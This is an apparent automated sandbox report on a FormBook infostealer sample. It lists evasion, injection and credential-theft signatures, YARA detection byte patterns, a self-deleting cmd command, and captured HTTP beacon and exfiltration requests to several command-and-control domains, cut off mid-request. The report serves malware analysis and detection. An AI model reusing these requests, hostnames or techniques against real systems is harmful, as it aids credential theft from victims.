
Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name:mp0nMsMroT.exe
Analysis ID:286180
MD5:26a5cbbf551c2a810792aad03ed4d51b
SHA1:b509a59df8bcbb441cb8f527c920a37e49521098
SHA256:af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • mp0nMsMroT.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
    • mp0nMsMroT.exe (PID: 6732 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4608 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5556 cmdline: /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
  • 0x160fc:$sqlite3step: 68 34 1C 7B E1
  • 0x16018:$sqlite3text: 68 38 2A 90 C5
  • 0x1613d:$sqlite3text: 68 38 2A 90 C5
  • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
  • 0x160fc:$sqlite3step: 68 34 1C 7B E1
  • 0x16018:$sqlite3text: 68 38 2A 90 C5
  • 0x1613d:$sqlite3text: 68 38 2A 90 C5
  • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
1.2.mp0nMsMroT.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.mp0nMsMroT.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x838a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18107:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1917a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: mp0nMsMroT.exe | Virustotal: Detection: 47%
Source: mp0nMsMroT.exe | ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: mp0nMsMroT.exe | Joe Sandbox ML: detected
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime | 0_2_00408454
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn | 0_2_00405098
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose | 5_2_02D7F470
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop edi | 1_2_00415023
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop edi | 1_2_0040C12E
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop esi | 1_2_004151C5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop ebx | 1_2_004066D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 5_2_02D85023
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop esi | 5_2_02D851C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 5_2_02D7C12E
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx | 5_2_02D766D7

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1
  Host: www.smileyefero.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1
  Host: www.cxyl968.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1
  Host: www.bestselfietools.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1
  Host: www.homecaredispatch.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1
  Host: www.netrworksoultions.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1
  Host: www.splishysplashie.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1
  Host: www.ugpounds.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1
  Host: www.kuralike.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1
  Host: www.cdershoushichang.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1
  Host: www.cakoi.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1
  Host: www.davabeauty.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1
  Host: www.icfc-lr.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 34.196.13.28 34.196.13.28
Source: Joe Sandbox View | IP Address: 34.196.13.28 34.196.13.28
Source: Joe Sandbox View | IP Address: 64.98.145.30 64.98.145.30
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: TUCOWS-3CA TUCOWS-3CA
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.cxyl968.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.cxyl968.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.cxyl968.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.bestselfietools.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.bestselfietools.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.bestselfietools.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 41 73 59 74 6c 2d 66 2d 77 4b 55 42 4a 4b 33 49 30 72 51 6a 30 57 75 48 41 55 44 72 71 53 75 31 6e 43 28 46 69 77 49 50 47 76 72 4d 6d 6e 4c 76 58 4b 71 5a 69 35 28 57 42 75 77 2d 6c 76 78 63 68 75 49 32 59 42 63 68 30 43 52 45 39 45 34 70 47 36 75 6a 51 31 6a 49 67 7a 4f 7a 64 65 52 6b 30 44 56 6a 74 4a 48 36 33 2d 6f 74 45 31 34 4b 6f 73 34 5f 70 30 73 48 57 49 7a 49 6d 61 75 4f 55 54 62 6b 31 4f 6a 43 6a 58 78 6e 6c 76 69 4c 69 44 71 4d 7e 7a 64 4c 28 4a 44 79 64 72 51 4f 72 55 38 50 62 36 74 53 31 41 78 59 53 79 78 34 50 48 37 47 7a 41 6e 68 78 67 63 51 32 57 6f 64 6f 75 37 7a 35 45 36 70 33 52 28 6f 79 36 67 65 49 64 50 2d 46 69 62 4d 51 30 6e 30 63 77 34 65 5a 46 50 63 4c 4e 45 58 69 6c 67 42 73 71 4f 71 34 36 30 6c 59 39 72 36 6c 5a 6b 73 45 50 50 63 6a 31 37 43 4e 6f 70 39 4f 45 55 72 39 71 48 42 35 32 74 68 45 36 75 38 45 65 5a 61 63 30 69 6d 46 35 43 46 49 69 59 79 6d 50 69 64 37 59 43 7a 66 6c 78 4e 75 46 33 68 78 44 68 54 33 73 4f 42 6e 4e 61 44 41 43 71 37 4f 48 39 36 4c 77 62 53 35 66 74 55 6c 69 71 63 51 59 50 32 6f 42 28 76 72 79 77 74 48 44 36 45 63 6d 4c 7a 6d 79 6f 6b 42 57 75 79 46 37 61 73 6e 45 39 5f 5a 6d 7e 62 4f 57 5a 67 35 45 4f 75 6f 62 5a 55 30 44 31 52 67 51 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.homecaredispatch.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.homecaredispatch.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.homecaredispatch.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 37 46 6c 6e 35 2d 47 4c 4d 4d 47 46 7e 67 33 5a 41 69 77 33 39 2d 4c 63 4d 5a 55 58 68 33 42 69 39 6d 61 79 63 74 52 6f 56 4d 49 72 52 4c 77 6a 6f 44 76 48 6d 34 36 39 59 44 7a 4f 30 4a 36 41 49 49 35 72 6b 4d 32 69 46 45 52 52 65 6e 77 39 78 74 56 49 44 54 41 6d 30 4d 78 47 77 4b 6e 48 58 6d 55 4d 72 75 4f 6a 30 41 34 33 35 57 72 63 6c 30 46 49 49 39 30 4a 45 59 34 75 4a 53 69 67 39 57 6e 42 33 50 77 46 32 79 6c 58 51 4a 4c 62 65 77 49 32 33 33 51 59 4b 65 4f 6c 7a 36 7e 31 4c 78 38 56 6a 6a 30 43 78 72 6b 5f 42 36 30 56 6f 64 68 5f 56 52 71 39 6b 73 54 49 64 4a 74 65 6b 4f 7a 34 70 46 68 73 77 33 53 52 75 69 6a 79 28 67 36 72 6f 36 69 4a 7a 45 31 78 77 6a 67 63 4b 71 79 6c 6d 41 38 6e 36 56 78 65 6e 64 7e 4b 71 51 61 39 43 61 38 6d 77 30 49 55 55 39 51 43 6c 59 51 50 62 5f 62 51 34 36 71 54 4b 46 48 75 54 73 71 5f 31 6a 53 67 4b 42 71 49 59 57 42 64 71 34 58 54 31 70 58 4a 44 77 32 55 31 43 52 6c 47 32 51 30 59 6b 43 43 4e 2d 58 77 50 76 54 6d 78 6b 35 64 4e 63 79 5a 28 6a 4f 68 52 4b 4d 58 7e 4a 41 76 73 49 72 36 59 74 49 5a 6f 2d 63 71 7e 76 36 42 6a 43 45 74 69 73 44 71 6f 5a 49 67 77 72 43 6d 4c 51 5a 4d 7e 6f 72 63 4e 42 6d 6c 7e 2d 54 62 72 54 67 44 6b 2d 74 35 57 69 78 43 6d 51 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
Source: global traffic | HTTP traffic detected:
  POST /0tog/ HTTP/1.1
  Host: www.netrworksoultions.com
  Connection: close
  Content-Length: 411
  Cache-Control: no-cache
  Origin: http://www.netrworksoultions.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.netrworksoultions.com/0tog/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 4b 38 65 50 59 3d 57 79 4e 6f 53 68 67 6a 6f 69 77 55 4a 44 36 31 6b 55 79 5f 39 74 37 67 62 77 55 4e 37 36 74 62 45 6b 71 78 70 4d 7e 53 68 32 47 67 6a 34 67 66 55 4e 44 49 72 48 77 64 67 71 66 4c 71 2d 31 62 4a 30 68 36 56 76 50 51 59 44 38 48 42 32 6f 51 41 52 74 58 67 48 43 4a 54 71 75 68 71 35 7a 4f 4e 42 59 54 76 50 75 35 74 4f 58 54 6c 35 65 35 33 44 58 62 65 58 30 51 79 4f 55 49 4e 6e 6a 39 28 53 73 4c 70 59 35 56 74 67 6d 4a 79 4f 51 75 70 6a 6c 5a 65 37 6e 47 49 37 63 41 61 55 6a 5f 28 4d 49 75 41 44 4e 6d 6e 47 4f 6c 4e 61 64 77 6c 55 6e 36 7e 7a 28 2d 38 46 67 65 61 78 72 75 52 72 4a 6f 48 39 65 6f 47 44 61 55 6f 75 38 64 72 6b 73 42 51 4f 4b 6c 6c 50 30 32 4b 35 6e 6f 78 72 65 4a 73 6a 6f 50 64 42 68 75 47 5f 6f 50 30 42 69 46 4b 78 4d 31 74 36 7e 50 45 6c 35 44 35 50 53 44 39 52 75 55 56 6c 51 33 35 57 6e 4b 74 2d 31 57 74 58 65 6f 58 59 6b 7a 39 47 79 44 34 2d 41 53 43 61 44 5f 35 35 79 76 42 6c 37 79 74 59 39 47 7e 2d 5a 4f 4e 76 61 50 4e 74 77 74 47 